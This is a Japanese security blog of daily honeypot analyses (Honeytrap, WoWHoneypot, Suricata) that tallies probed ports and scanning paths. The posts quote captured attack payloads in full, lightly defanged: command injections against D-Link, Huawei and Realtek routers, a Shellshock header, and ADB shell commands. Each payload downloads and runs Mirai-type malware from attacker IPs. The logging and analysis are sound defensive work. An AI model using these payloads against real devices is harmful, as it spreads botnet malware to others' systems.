sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(24日目:9/1)

本来であれば、8/30,8/31の分析を行うはずでしたが、こちらの手違いでデータをロストしてしまいましたorz

今回は9/1分の分析となります。

9/1 Honeytrap 3422件(データ部 0byte以上)

ポート 件数 割合 サービス
445 1,813 52.98% SMB
22 118 3.45% SSH
3389 84 2.46% RDP
1433 77 2.25% Microsoft SQL Server
502 61 1.78% Modbus Protocol 
52869 58 1.70% D-Link, Realtek SDK
8080 47 1.37% PROXY
5986 34 0.99% Windows PowerShell Default psSession Port 
81 32 0.94%

goahead

64738 32 0.94% Mumble VoIP server

 

マルウェアダウンロード関連

宛先ポート 対象 パス ペイロード
5555 Android Debug Bridge   CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN[.][.][.][.][.][.][.][.]Ý[.][.][.]&A[.][.]°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
VirusTotal
  CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN)[.][.][.][.][.][.][.][.][.][.][.]O/[.][.]°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
VirusTotal
8080 JBOSS GET /jbossass/jbossass.jsp GET /jbossass/jbossass[.]jsp?ppp=wget+hxxp%3A%2F%2F49[.]123[.]1[.]37%2Fctbuzs%2Fstdpic%2F2015%2F02%2Fdevice%2Fjboss%2Fplaintext[.]txt HTTP/1[.]1
User-Agent: jexboss
VirusTotal
D-Link DSL-2750B GET /login.cgi wget%20hxxp://148[.]72[.]176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
User-Agent: Hakai/2[.]0
VirusTotal
808 D-Link 社のルータ
(CVE-2015-2051) 
POST /HNAP1/  SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148[.]72[.]176[.]78/ngynx && sh ngynx`
VirusTotal
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mips && chmod 777 /tmp/kenjiro[.]mips/ && /tmp/kenjiro[.]mips`
VirusTotal
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://77[.]87[.]77[.]250/izuku[.]mips && chmod +x izuku[.]mips; [.]/izuku[.]mips`
VirusTotal
 
37215 Huawei社のルータ POST /ctrlt/DeviceUpgrade_1  <NewStatusURL>$(busybox wget -g 142[.]93[.]245[.]252 -l /tmp/aa1 -r /gaybub/miori[.]mips;busybox chmod +x /tmp/aa1 ;/tmp/aa1 huawei)</NewStatusURL>
VirusTotal
   
52869 Realtek SDK miniigd SOAP   POST /picdesc.xml <NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/rr`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/miori[.]mips`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/;wget hxxp://46[.]101[.]250[.]21/8mips8[.]mips -O 8mips8`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient>
VirusTotal
<NewInternalClient>`cd /tmp/; wget hxxp://76[.]74[.]170[.]223/shit[.]mips -O k`</NewInternalClient>
VirusTotal

 

大きな傾向の変化は特にありませんでした。
分析する上で、手動で行なっている部分が非常に多いため、自動化で分析に時間がかけられるようにしたいと思っています。また、IDSのsuricataも導入したものの、うまく使えていないのが現状となっています。
今月は自動化とIDSのチューニングに力を入れて、頑張っていきます。

ハニーポット簡易分析(21,22日目:8/28,8/29)

遅れましたが、Honeypotの簡易分析  8/28,8/29分の更新となります。

8/28

Honeytrap 3,418 件 (データ部 0byte以上)
※80ポートは除く

ポート 件数 割合 サービス
445 1,954 57.17% SMB
3389 69 2.02% RDP
1433 62 1.81% Microsoft SQL Server
3128 52 1.52% ?
8080 46 1.35% PROXY
52869 45 1.32% D-Link, Realtek SDK
81 37 1.08% ?
8443 35 1.02% ?
5555 32 0.94% Android Debug Bridge
4500 32 0.94% IPSec NAT Traversal

8/29 
Honeytrap 3,600 件 (データ部 0byte以上)
※80ポートは除く

ポート 件数 割合 サービス
445 2,057 57.14% SMB
3389 151 4.19% RDP
8080 70 1.94% PROXY
1433 68 1.89% Microsoft SQL Server
9600 62 1.72% ?
52869 46 1.28% D-Link, Realtek SDK
5555 37 1.03% Android Debug Bridge
1471 32 0.89% ?
81 24 0.67% ?
22 22 0.61% SSH

 

<マルウェアダウンロード>

宛先ポート リクエス ダウンロード 脆弱性
5555   wget hxxp://207[.]148[.]78[.]152/br
VirusTotal
Android Debug Bridge に対する攻撃
wget hxxp://185[.]162[.]130[.]187/adbs
VirusTotal
wget hxxp://27[.]102[.]115[.]44/adbs
VirusTotal
8081 POST /HNAP1/ wget hxxp://148[.]72[.]176[.]78/ngynx
VirusTotal
D-Link 社のルータへの攻撃(CVE-2015-2051) 
wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mip
VirusTotal
wget hxxp://148[.]72[.]176[.]78/ken[.]sh

VirusTotal

37215 POST /ctrlt/DeviceUpgrade_1 wget -g 209[.]141[.]33[.]86
VirusTotal
Huawei社のルータを狙った攻撃
wget -g 31[.]220[.]43[.]190

VirusTotal

52869 POST /picdesc[.]xml wget hxxp://185[.]10[.]68[.]127/rtbin

VirusTotal

Realtek SDK の miniigd SOAP脆弱性を狙った攻撃
wget hxxp://80[.]211[.]112[.]150/mips

VirusTotal

wget hxxp://80[.]211[.]137[.]127/ntpd

VirusTotal

wget hxxp://159[.]65[.]232[.]56/xd[.]mips

VirusTotal

wget hxxp://80[.]211[.]55[.]29/SSG/mips[.]SSG

VirusTotal

wget hxxp://107[.]191[.]99[.]41/elf[.]mips

VirusTotal

wget hxxp://167[.]99[.]228[.]78/8mips8[.]mips

VirusTotal

wget hxxp://167[.]99[.]228[.]78/8mips8[.]mip

VirusTotal

wget hxxp://185[.]10[.]68[.]127/rtbin
VirusTotal

 他のハニーポッターの話を聞いてみると、やはりMirai関連のマルウェアが多くを占めています。まだまだ、継続して検知しそうです。

 

以上、簡易分析でした。

 

ハニーポット簡易分析(20日目:8/27)

8/27の分析となります。 先日、IDSである Suricataを導入しましたので、そちらの結果も記載しています(まだまだ、チューニングが必要ですが。。。)

8/27 Honeytrap分析結果
※なお、80ポートの通信は含まれていません。
検知数:7802件(データ部 0byte以上 3606件)

ポート 件数 割合 サービス 補足
445 1,992 47.95% SMB  
220 292 7.03% IMAP3

コマンド:SSH-2.0-libssh2_1.4.3

1433 68 1.64% Microsoft SQL Server  
3389 57 1.37% RDP  
52869 51 1.23% D-Link, Realtek SDK マルウェアダウンロード
22 48 1.16% SSH  
35928 42 1.01% ? マルウェアダウンロード 
81 41 0.99% ?  
3390 39 0.94% ?  
8080 36 0.87% PROXY  

 

IDSの検知
※全ポートの通信を含んでいます。

シグネチャ 検知数 割合
POLICY Cleartext WordPress Login 6,301 99.31%
HTTP missing Host header 43 0.68%
SMTP no server welcome message 1 0.02%

 

宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148.72.176[.]78/ngynx && sh ngynx`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.32[.]156/bin && sh /tmp/bin`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.33[.]171/kenjiro.mips && chmod 777 /tmp/kenjiro.mips/ && /tmp/kenjiro.mips`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp; >DIR & cd /var; >DIR; rm -rf *; wget hxxp://148.72.176[.]78/ken.sh; sh ken.sh`


宛先ポート:37215
Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・$(busybox wget -g 168.235.82[.]217 -l /tmp/xDvAq -r mpswof ;chmod +x /tmp/xDvAq ;/tmp/xDvAq h)

宛先ポート:52869
Realtek SDK の miniigd SOAP脆弱性を狙った攻撃
→mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・cd /tmp/;wget hxxp://80.211.47[.]28/jackmymips
・cd /tmp/;wget hxxp://159.65.232[.]56/xd.mips
・cd /tmp/;wget hxxp://107.191.99[.]41/elf.mips -O elf
・cd /tmp/;wget hxxp://142.93.1[.]75/hoho.mips -O hoho
・cd /tmp/;wget hxxp://167.99.228[.]78/ntpd.mips -O ntpd
・cd /tmp/;wget hxxp://167.99.228[.]78/8mips8.mips -O 8mips8
・cd /tmp/;wget hxxp://128.199.45[.]173/sora.mips -O sora.mips

宛先ポート:5555
Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207.148.78.[.]52/br -O- >br;sh br;busybox wget hxxp://207.148.78[.]152/r -O- >r;sh r;curl hxxp://207.148.78.152/c >c;sh c;busybox curl hxxp://207.148.78[.]152/bc >bc;sh bc;rm -rf bc br r c;.

CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27.102.115.[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27.102.115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.

 

特段、傾向的に大きく変わったものはありませんでした。
IDSはデフォルトのまま導入していることもあり、チューニングしないと有効な分析は出来なさそうでした。現状は、Wordpressのログイン試行を大量に検知したことぐらいが分かるものでした。チューニングは9月ごろから本格的に実施出来ればと思っています。

以上、今回の簡易分析結果でした。

 

ハニーポット簡易分析(19日目:8/26)

8/26からHoneytrapのログが復活したので、Honeytrapの分析を行いたいと思います。

 

8/26 Honeytrap分析結果
検知数 6335件(データ部 0byte以上 3622件)

 

ポート 件数 割合 サービス 補足
445 1,781 49.16% SMB  
1433 70 1.93% Microsoft SQL Server  
3389 65 1.79% RDP  
52869 53 1.46% D-Link, Realtek SDK マルウェアダウンロード
8888 51 1.41% ?  
81 49 1.35% ?  
8080 47 1.30% PROXY  
992 34 0.94% TELNET protocol over TLS/SSL  
500 33 0.91% ipsec  
19 32 0.88% chargen  

 

宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051) 
POST /HNAP1/ HTTP/1.0
wget hxxp://148[.]72[.]176[.]78/ngynx
wget hxxp://176[.]32[.]32[.]156/bin

宛先ポート:37215
Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
wget -g 31[.]220[.]43[.]190

宛先ポート:52869
Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picdesc.xml HTTP/1.1
wget hxxp://80[.]211[.]67[.]245/mips
wget hxxp://159[.]65[.]232[.]56/xd.mips
wget hxxp://107.191.99.41/elf.mips
wget hxxp://167.99.228.78/ntpd.mips
wget hxxp://128.199.45.173/sora.mips

宛先ポート:5555
Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.

CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.

 
今回の分析は以上となります。最近、Suricataも導入したため、その結果も近日中に報告できればと思ってます(ただし、デフォルト設定で入れたため、有効な検知が少ないですが。。。)。

 

ハニーポット簡易分析(18日目:8/25)

Honeytrapのログがうまく取得出来ていなかった関係で WoWHoneypotの簡易分析となります。今回もApache Struts2 の脆弱性(CVE-2018-11776)(S2-057)は来ていませんでした。。。。8/25分のWoWHoneypotの簡易分析となります。

 

WoWHoneypotの分析(8/25)

検知数:180件
<検知パス一覧>

URL パス 概要 マルウェア
ダウンロード
/ インデックスファイルへのアクセス ×
/12.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/56.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/9678.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/PMA/index.php 調査行為(DB関連) ×
/PMA2/index.php 調査行為(DB関連) ×
/_query.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/admin/PMA/index.php 調査行為(DB関連) ×
/admin/index.php 調査行為(DB関連) ×
/admin/mysql/index.php 調査行為(DB関連) ×
/admin/mysql2/index.php 調査行為(DB関連) ×
/admin/phpMyAdmin/index.php 調査行為(DB関連) ×
/admin/phpmyadmin2/index.php 調査行為(DB関連) ×
/admin/zkyzp.jsp PW・ID 共にadminでのアクセス ×
/ak.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/ak47.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/angge.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/aotu.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/aw.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/cainiao.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/claroline/phpMyAdmin/index.php 調査行為(DB関連) ×
/cmd.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/cmdd.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/cmv.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/cmx.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/conflg.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/data.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/db.init.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/db__.init.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/db_cts.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/db_pma.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/db_session.init.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/dbadmin/index.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/defect.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/desktop.ini.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/fack.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/favicon.ico die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/feixiang.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/fileserver/sex../../..%5Cadmin/zkyzp.jsp PUTコマンドの試行 ×
/help.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/hh.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/hm.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/index.php indexファイルへのアクセス ×
/infoo.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/ip.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/java.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/l7.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/l8.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/lala-dpr.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/lindex.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/log.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ D-Linkの脆弱性を狙った攻撃
/login.cgi?cli=aa%20aa%27;wget%20hxxp://199[.]195[.]254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ D-Linkの脆弱性を狙った攻撃
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ D-Linkの脆弱性を狙った攻撃
/lol.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/manager/html Tomcat管理マネージャーへのアクセス ×
/min.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/muhstik-dpr.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/muhstik.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/muhstik2.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/muhstiks.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/mx.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/myadmin/index.php 調査行為(DB関連) ×
/myadmin2/index.php 調査行為(DB関連) ×
/mysql-admin/index.php 調査行為(DB関連) ×
/mysql/index.php 調査行為(DB関連) ×
/mysqladmin/index.php 調査行為(DB関連) ×
/mz.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/pe.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/phpMyAdmin.old/index.php 調査行為(DB関連) ×
/phpMyAdmin/index.php 調査行為(DB関連) ×
/phpMyAdmin/phpMyAdmin/index.php 調査行為(DB関連) ×
/phpMyAdminold/index.php 調査行為(DB関連) ×
/phpMyadmin_bak/index.php 調査行為(DB関連) ×
/phpadmin/index.php 調査行為(DB関連) ×
/phpma/index.php 調査行為(DB関連) ×
/phpmyadmin-old/index.php 調査行為(DB関連) ×
/phpmyadmin0/index.php 調査行為(DB関連) ×
/phpmyadmin1/index.php 調査行為(DB関連) ×
/phpmyadmin2/index.php 調査行為(DB関連) ×
/phpstudy.php 調査行為(DB関連) ×
/pma-old/index.php 調査行為(DB関連) ×
/pmamy/index.php 調査行為(DB関連) ×
/pmamy2/index.php 調査行為(DB関連) ×
/pmd/index.php 調査行為(DB関連) ×
/q.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/qaq.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/qq.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/s.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/sheep.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/ssaa.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/system.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/test.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/text.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/tools/phpMyAdmin/index.php 調査行為(DB関連) ×
/typo3/phpmyadmin/index.php 調査行為(DB関連) ×
/uploader.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/w.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/wanan.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/wc.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/web/phpMyAdmin/index.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/webdav/ die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/webslee.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/weixiao.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/wp-config.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/wpo.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/wshell.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/wuwu11.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/www/phpMyAdmin/index.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/x.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xampp/phpmyadmin/index.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xiao.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xiaoma.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xshell.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xw.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xw1.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/xx.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/yao.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/yumo.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/z.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×
/zuoshou.php die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 ×


マルウェアダウンロード>
D-Linkの脆弱性を狙った攻撃を検知していますが、おそらくMirai系だと思います。時間があるときにここらのマルウェアは分析したいですね。

wget hxxp://176[.]32[.]32[.]156/bin
VirusTotal

wget hxxp://199[.]195[.]254[.]118/dlink
wget hxxp://209[.]141[.]33[.]86/d
VirusTotal

 

以上、簡易分析となります。

ハニーポット簡易分析(17日目:8/24)

本来であれば、Honeytrapの分析を行う予定でしたが、なぜかログが取得出来ていなかったため、今回はWoWHoneypotの分析を行いました。

8/24 WoWHoneypot検知数 49件

接続先 概要 攻撃
/ indexファイルへのアクセス ×
/index.php indexファイルへのアクセス ×
/ipc$ 調査行為 ×
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ D-Linkの脆弱性を狙った攻撃
※Hakai/2.0
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ D-Linkの脆弱性を狙った攻撃
※Shinka/1.0
/login.cgi?cli=aa%20aa%27;wget%20hxxp://212[.]237[.]32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ D-Linkの脆弱性を狙った攻撃
※LMAO/2.0
/login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ D-Linkの脆弱性を狙った攻撃
※Hakai/2.0


マルウェアの分析は以下となります。

ダウンロード可能
wget hxxp://176[.]32[.]32[.]156/bin →https://www.virustotal.com/#/file/fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3/detection

ダウンロード不可
wget hxxp://209[.]141[.]33[.]86/d
wget hxxp://212[.]237[.]32[.]62/k
wget hxxp://50.115.166.136/hakai.mips

今回は、Hakai 2.0 がダウンロード可能でした。Honeytrapと比較すると検知数は少ないですが、検知している通信が違うので、分析していて面白いですね。また、明日もHoneytrapのログは取れていないため、WoWHoneypotを分析する予定です。

以上、簡易分析となります。

ハニーポット簡易分析(16日目:8/23)

Apache Struts2脆弱性(CVE-2018-11776)(S2-057)が話題になっていますが、 23日時点ではまだ攻撃は観測できていませんでした。
 早く観測できないかなーと思いつつ、8月23日分の分析を行います。

 

8/23 Honeytrap 分析
検知数 5583件 (データ有 3043件)

宛先ポート サービス 検知数 割合 攻撃概要
445 SMB 1,627 53.47% 調査行為
22 SSH 90 2.96% 調査行為
1433 Microsoft SQL Server 67 2.20% 調査行為
3389 RDP 54 1.77% 調査行為
8088 Asterisk (PBX) Web Configuration utility 41 1.35% /conf  へのアクセス
52869 D-Link, Realtek SDK 40 1.31% マルウェアダウンロード
81 ? 40 1.31% 調査行為
993 IMAPS 38 1.25% 調査行為
8000 ? 36 1.18% 調査行為
2375 Docker 34 1.12% 調査行為


マルウェアダウンロード: 
ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)

POST /HNAP1/ HTTP/1[.]0
SOAPAction: hxxp;//purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp;//176[.]32[.]32[.]156/bin && sh /tmp/bin`

ポート:37215
Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
wget -g 209[.]141[.]33[.]86

ポート:52869
Realtek SDK の miniigd SOAP脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picsdesc[.]xml HTTP/1[.]1
wget hxxp;//212[.]237[.]32[.]62/mips
wget hxxp;//159[.]65[.]232[.]56/xd[.]mips
wget hxxp;//167[.]99[.]14[.]199/bogan[.]mips
wget hxxp;//107[.]191[.]99[.]41/elf[.]mips
wget hxxp;//142[.]93[.]1[.]75/hoho[.]mips

ポート:8080
① Shell Shock の脆弱性を狙った攻撃
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0[.]sh && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/php && /usr/bin/wget -c hxxp;//185[.]14[.]30[.]79/S0[.]sh -P /tmp && /bin/sh /tmp/S0[.]sh 0<&1 2>&1

②D-Linkのルータの脆弱性を狙った攻撃
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp;//209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/[.]shinka;sh%20/tmp/[.]shinka%27$ HTTP/1[.]1

ポート 5555
Android Debug Bridge に対する攻撃
CNXN ¼±§±host:: OPEN Ý °¯º±shell:cd /data/local/tmp;wget hxxp;//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp;//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp;//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp;//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]

CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp;//185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp;//185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]

CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:cd /data/local/tmp/; busybox wget hxxp;//27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp;//27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]

今回の分析は以上となります。